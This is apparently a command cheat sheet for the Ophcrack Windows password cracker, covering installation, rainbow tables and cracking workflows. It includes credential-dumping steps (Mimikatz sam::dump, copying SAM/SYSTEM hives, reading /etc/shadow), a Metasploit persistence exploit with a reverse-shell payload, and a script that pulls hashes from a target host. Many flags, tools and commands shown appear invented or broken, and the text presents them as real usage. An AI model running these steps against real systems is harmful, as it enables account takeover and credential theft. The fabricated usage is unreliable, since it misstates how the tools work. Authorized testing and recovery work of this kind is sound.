Overview
Ophcrack is a Windows password cracker that uses rainbow tables to quickly recover plaintext passwords from LM and NTLM hashes. It supports cracking passwords from Windows systems by dumping and analyzing password hashes. Ophcrack can work standalone or with tools like Ophcrack Live to crack passwords on Windows systems without booting the OS.
The tool combines efficient rainbow table lookups with additional brute-force capabilities for remaining passwords. It’s commonly used in penetration testing, incident response, and authorized password recovery scenarios.
Installation
Windows Installation
GUI Application
1. Download installer from ophcrack.sourceforge.net
2. Run installer (ophcrack-3.8.0-installer.exe)
3. Follow installation wizard
4. Launch Ophcrack from Start Menu
Linux Installation
Debian/Ubuntu
sudo apt-get update
sudo apt-get install ophcrack ophcrack-data
RedHat/CentOS/Fedora
sudo yum install ophcrack
# or
sudo dnf install ophcrack
Build from Source
# Install dependencies
sudo apt-get install build-essential cmake libqt4-dev libssl-dev
# Download source
wget https://sourceforge.net/projects/ophcrack/files/ophcrack/3.8.0/ophcrack-3.8.0.tar.bz2
tar -xjf ophcrack-3.8.0.tar.bz2
cd ophcrack-3.8.0
# Build
cmake .
make
sudo make install
Kali Linux
sudo apt-get install ophcrack ophcrack-data
Docker Installation
# Build Docker image
docker build -t ophcrack .
# Run with GUI (requires X11)
docker run -it --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ophcrack
Verify Installation
ophcrack --version
ophcrack --help
Basic Concepts
| Concept | Description |
|---|
| Rainbow Table | Precomputed hash-to-password mappings for fast lookup |
| NTLM Hash | Modern Windows hash format (MD4-based) |
| LM Hash | Legacy Windows hash format (DES-based) |
| Hash Chain | Chain of computation for rainbow table |
| Reduction Function | Mathematical function for rainbow table generation |
| Brute-Force | Systematic password generation and testing |
| Lookup | Fast password retrieval from rainbow tables |
| Coverage | Percentage of password space covered by tables |
Core Commands
| Command | Description |
|---|
ophcrack -h | Show help message |
ophcrack --version | Display version |
ophcrack -f <file> | Load hash file |
ophcrack -d <dir> | Specify rainbow table directory |
ophcrack -n <num> | Use N threads for cracking |
ophcrack -l | List available rainbow tables |
ophcrack -g | GUI mode |
ophcrack -c | Console mode |
GUI Mode Usage
Launch GUI
# Start GUI interface
ophcrack -g
# or
ophcrack
GUI Workflow
1. Load NTLM Hashes
- From File → Select hash file
- Import SAM dump
- Paste hashes manually
2. Select Rainbow Tables
- Choose table sets (XP, Vista, 7, etc.)
- Verify table locations
- Enable/disable specific tables
3. Start Cracking
- Click "Crack" button
- Monitor progress
- View cracked passwords
4. Export Results
- Save results to file
- Copy passwords
- Generate report
Console Mode Usage
Load and Crack Hashes
# Basic cracking
ophcrack -f hashes.txt
# Specify rainbow table directory
ophcrack -f hashes.txt -d /path/to/tables/
# Use specific number of threads
ophcrack -f hashes.txt -n 4
# Verbose output
ophcrack -f hashes.txt -v
# Format: username:RID:LM_HASH:NTLM_HASH
Administrator:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c
Dump Hashes from Windows
Using Mimikatz
# Run Mimikatz to extract hashes
mimikatz.exe
# In mimikatz prompt
privilege::debug
token::elevate
sam::dump
# Output will show NTLM hashes
Using hashcat
# Extract from SAM/SYSTEM
hashcat-tools pwdump.pl
sudo ./pwdump.pl > hashes.txt
# Output hashes for Ophcrack
Using Registry Dump
# Copy SAM file (requires SYSTEM privileges)
copy C:\Windows\System32\config\SAM C:\temp\SAM
copy C:\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Use on attacker machine
samdump2 SYSTEM SAM > hashes.txt
# Unshadow combining /etc/passwd and /etc/shadow
unshadow /etc/passwd /etc/shadow > crackable.txt
# Create Ophcrack-compatible format (convert to MD5/NTLM)
john --format=md5 --wordlist=rockyou.txt crackable.txt
Rainbow Tables
Available Table Sets
| Table Set | Target | Coverage | Size |
|---|
| XP Free | WinXP/2003 | 99.9% (8 chars) | ~700 MB |
| XP Special | WinXP/2003 | 99.9% (8 chars special) | ~1 GB |
| Vista Free | Vista/7/8 | 99.9% (8 chars) | ~700 MB |
| Vista Special | Vista/7/8 | 99.9% (8 chars special) | ~1 GB |
| 7 Free | Windows 7 | 99.9% (8 chars) | ~700 MB |
| 7 Special | Windows 7 | 99.9% (8 chars special) | ~1 GB |
| Strongsalt Free | Any | 99.9% (8 chars) | ~700 MB |
Download Rainbow Tables
# Official Ophcrack site (free tables)
# https://ophcrack.sourceforge.io/tables.php
# Command-line download
wget https://sourceforge.net/projects/ophcrack/files/tables/...
# Mount rainbow tables
mkdir -p /opt/ophcrack/tables
tar -xzf ophcrack_tables.tar.gz -C /opt/ophcrack/tables/
# Create configuration
vi ~/.ophcrack/ophcrack.conf
# Add table directories
[rainbow_tables]
path = /opt/ophcrack/tables/xp_free/
path = /opt/ophcrack/tables/vista_free/
# Verify tables
ophcrack -l
Crack Operations
Single Hash Cracking
# Crack single NTLM hash
echo "username:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c" > single.txt
ophcrack -f single.txt
Batch Cracking
# Crack multiple hashes from file
ophcrack -f hashes.txt --batch
# Output all results to file
ophcrack -f hashes.txt --batch --output results.txt
Advanced Cracking Parameters
# Multi-threaded cracking
ophcrack -f hashes.txt -n 8
# Fast mode (less accurate)
ophcrack -f hashes.txt --fast
# Thorough mode (more accurate)
ophcrack -f hashes.txt --thorough
# Specify rainbow table directory
ophcrack -f hashes.txt -d /mnt/rainbow_tables/
Real-World Scenarios
Post-Compromise Password Recovery
# 1. Extract hashes from compromised system
dumped-hashes.txt contains SAM dumps
# 2. Convert to Ophcrack format
python3 -c "
import sys
for line in sys.stdin:
parts = line.strip().split(':')
user = parts[0]
ntlm = parts[3]
print(f'{user}:1000::::::{ntlm}')
" < sam_dump.txt > ophcrack_input.txt
# 3. Crack with Ophcrack
ophcrack -f ophcrack_input.txt
# 4. Recover plaintext passwords
# Monitor progress and collect results
Incident Response Investigation
# Collect system hashes
# From forensic image or live system
imager extract SAM
# Process with Ophcrack
ophcrack -f forensic_hashes.txt --batch --output report.txt
# Analyze results for indicators
grep -v "^#" report.txt | grep -v "Cracking" > recovered_passwords.txt
System Access Recovery
# Authorized password recovery scenario
# 1. Boot with Ophcrack Live USB
# 2. Automatic SAM detection
# 3. Password cracking begins
# 4. Passwords displayed after cracking
Hashcat Post-Processing
# Extract hashes for hashcat
ophcrack -f hashes.txt --hash-only > hashes.hashcat
# Run hashcat for remaining hashes
hashcat -m 1000 -a 3 hashes.hashcat ?a?a?a?a?a?a?a?a
John the Ripper Comparison
# Extract NTLM hashes
hashcat-tools pwdump.pl > hashes.txt
# Try Ophcrack first (fast with rainbow tables)
ophcrack -f hashes.txt
# Then John for remaining
john --format=NT --wordlist=rockyou.txt hashes.txt
# Generate payload for SAM dump
msfconsole
use exploit/windows/local/persistence_service
set PAYLOAD windows/shell_reverse_tcp
# Dump SAM
set post/windows/gather/hashdump
run
# Convert and crack with Ophcrack
ophcrack -f dumped_hashes.txt
Optimization Techniques
Use GPU Acceleration
# NVIDIA GPU support (with CUDA)
# Recompile with CUDA support
cmake . -DUSE_CUDA=ON
make
# Run with GPU
ophcrack -f hashes.txt --gpu
Rainbow Table Selection
# Choose appropriate tables for target
# Windows XP/2003: Use XP tables
ophcrack -f hashes.txt -d /tables/xp_free/
# Windows 7/8: Use 7 tables
ophcrack -f hashes.txt -d /tables/7_free/
# Unknown: Try multiple table sets
ophcrack -f hashes.txt -d /tables/
Parallel Cracking
# Use multiple threads
ophcrack -f hashes.txt -n 16
# Distribute across machines
# Each instance processes different hash subset
# Combine results manually
Resource Management
# Limit memory usage
ophcrack -f hashes.txt --max-memory 2G
# CPU thread allocation
ophcrack -f hashes.txt -n 4 # 4 threads
# Monitor performance
ophcrack -f hashes.txt -n 8 --monitor
Hash File Optimization
# Remove duplicates
sort -u hashes.txt > hashes_unique.txt
ophcrack -f hashes_unique.txt
# Remove already-cracked entries
grep "^#" previous_results.txt | cut -d: -f3 > cracked_hashes.txt
comm -23 <(sort hashes.txt | cut -d: -f3) <(sort cracked_hashes.txt) > remaining.txt
Result Analysis
Output Interpretation
Loaded 5 hashes
Starting cracking...
[████████████░░░░░░░░░░░░░░] 45%
Results:
admin: Password123 [CRACKED]
user: [NOT FOUND]
guest: [blank password] [CRACKED]
test: abc123 [CRACKED]
Cracked Password Classification
[CRACKED] - Password found in rainbow tables
[NOT FOUND] - Not in tables, couldn't crack
[EMPTY] - No password (blank)
[DISABLED] - Account disabled
Export Results
# Save results to file
ophcrack -f hashes.txt --output results.txt
# Parse results
cat results.txt | grep "CRACKED" | cut -d: -f1,2
# Count success rate
grep "CRACKED" results.txt | wc -l
total_hashes=$(wc -l < hashes.txt)
echo "Success: $(grep -c CRACKED results.txt)/$total_hashes"
Security Considerations
- Use only on systems you own or have authorization to test
- Secure cracked passwords and results
- Consider privacy implications of password recovery
- Maintain audit trails of cracking operations
- Dispose of password lists securely
- Follow organizational security policies
- Respect legal and regulatory requirements
Limitations and Workarounds
Hashes Not Cracked
# Possible causes:
# 1. Rainbow table doesn't have password
# 2. Password outside character set
# 3. Password longer than table supports
# Workarounds:
# - Get larger rainbow tables
# - Use brute-force (slower)
# - Use hashcat with GPU
# - Dictionary + rules with John
Table Coverage
# Check table coverage
# Most tables: 99.9% for 8 characters
# Longer passwords less likely to crack
# Special characters: Use special table sets
# Calculate likelihood
# LM: Only 7 uppercase, high crack rate
# NTLM: Full character set, lower rate for long passwords
# If cracking is slow:
# 1. Allocate more CPU threads
# 2. Use GPU acceleration (NVIDIA)
# 3. Optimize rainbow table paths (SSD)
# 4. Reduce number of simultaneous hashes
Troubleshooting
Rainbow Tables Not Found
# Verify table locations
ls -la /opt/ophcrack/tables/
# Configure paths
ophcrack -d /path/to/tables/
# Check configuration file
cat ~/.ophcrack/ophcrack.conf
GUI Not Starting
# Install Qt dependencies
sudo apt-get install libqt4-gui
# Run in console mode
ophcrack -f hashes.txt -c
# Check for display server
echo $DISPLAY
# Correct hash format
username:RID:LM_HASH:NTLM_HASH
# Validate format
grep -E "^[^:]+:[0-9]+:[A-F0-9]{32}:[A-F0-9]{32}$" hashes.txt
# Convert from other tools
hashcat-tools prepare_hashes.sh input.txt > ophcrack_format.txt
Advanced Usage
Custom Rainbow Tables
# Generate custom tables
rainbowcrack genrt -t <hash_type> -c <charset> -l <min_len> -m <max_len> -s <start> -e <end>
# Example: SHA-1 tables
rainbowcrack genrt -t sha1 -c /PATH/TO/charset/mixalpha-numeric#1-8 \
-l 1 -m 8 -s 0 -e 100000000 myrt
Scripted Cracking
#!/bin/bash
# Automated hash cracking workflow
# 1. Extract hashes
source_system="target.example.com"
scp admin@$source_system:/backup/SAM .
# 2. Convert format
samdump2 SYSTEM SAM > hashes.txt
# 3. Crack with Ophcrack
ophcrack -f hashes.txt --batch --output results.txt
# 4. Parse and report
echo "=== Password Crack Results ===" > report.txt
echo "Total Hashes: $(wc -l < hashes.txt)" >> report.txt
echo "Cracked: $(grep -c CRACKED results.txt)" >> report.txt
echo "" >> report.txt
grep CRACKED results.txt >> report.txt
- Hashcat - GPU-accelerated password cracker
- John the Ripper - CPU-based password cracker
- Mimikatz - Credential extraction tool
- Hashtools - Hash utilities and conversion
- Rainbowcrack - Rainbow table generator
- Cain & Abel - Windows password recovery
References
